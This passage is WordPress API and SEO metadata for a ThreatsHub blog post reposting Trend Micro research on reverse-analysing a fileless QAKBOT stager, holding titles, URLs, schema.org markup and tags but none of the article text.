Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/","og_locale":"en_US","og_type":"article","og_title":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-12-17T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/cover-staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager","datePublished":"2021-12-17T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/"},"wordCount":1273,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Crime","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Ransomware","Trend Micro Research : Spam"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/","url":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/","name":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png","datePublished":"2021-12-17T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager.png","width":2334,"height":1875},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/staging-a-quack-reverse-analyzing-a-fileless-qakbot-stager\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44471"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44471\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/44472"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44471"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}